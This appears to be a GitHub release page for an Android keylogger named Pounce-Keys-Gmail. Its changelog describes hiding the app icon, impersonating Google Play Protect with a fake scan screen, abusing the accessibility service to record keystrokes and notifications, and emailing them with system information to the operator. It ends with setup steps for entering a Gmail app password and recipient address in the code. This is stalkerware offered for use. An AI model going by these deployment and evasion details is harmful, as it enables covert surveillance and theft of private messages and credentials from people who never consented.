Skip to content

Pounce-Keys-Gmail

Compare
Choose a tag to compare
@NullPounce NullPounce released this 12 Mar 22:57
· 49 commits to main since this release
4a42db7

March 16th 2024 3.0

Multi Device support "appends/adds the device model/manufacturer to every log message"

New GUI replicating a google play protect scan and a 3rd alert to enable the service that's a pop up.

<------------>
old

hidden icon up to android 13 instead of only 9

notifications are logged and sent again

system info sent on service enable

"should" now alert user to enable the service

updated the icon and text "general cleanup"


buffer is 200, apk's ending in 999 have a buffer of 999

App icon is now stealth "hidden from home and launcher screen" up to Android 13 instead of only version 9. (12.1 not vuln)

  • tested and working Android 5-13 (version 12.0 keylogs but 12.1 does not, 12.1 can get a sys info email, 14 untested.)

Now sends "logs" notifications again, it is tied in sync into the typing buffer.

Now sends system info on service enable. (soon as the accessibility service is enabled the email is sent "avoiding testing")

A drop down notification and a toast message will now alert the user to enable the service

  • using the stealth version disables this (may not work on all phones "let me know in Discord")

Updated the icon to replicate Google Play Protect and changed names from BatteryHealthService to GooglePlayProtectService

  • moved the java files up a folder from the BatteryHealth folder "deleted" up to the com folder making the top entry "package com;"

Opening the app just brings up the settings (or says app not installed and won't open)


1.0

this was a huge pain and learning curve, had to deal with an api bug but its fixed
works in 2023 using app password method thanks to @ 2picodin9 for the suggestion

this has a buffer of 200 to avoid spam
open APK Editor and open the apk or messagesender.java if in android studio

In AS it will show as follows:

private static final String USERNAME = "Your-Email@gmail.com";
private static final String APP_PASSWORD = "APP-PASSWORD";
private static final String RECIPIENT_EMAIL = "Your-Email@gmail.com";
private static final int MAX_BUFFER_SIZE = 200;

replace "APP-PASSWORD" with the 16 character long app password from your 2FA enabled google account

then replace "Your-Email@gmail.com" with your email in the username and recip lines

In APK Editor do a search and replace for:

APP-PASSWORD
Your-Email@gmail.com

with your info and then just save it, a search and replace as its everywhere in apk edit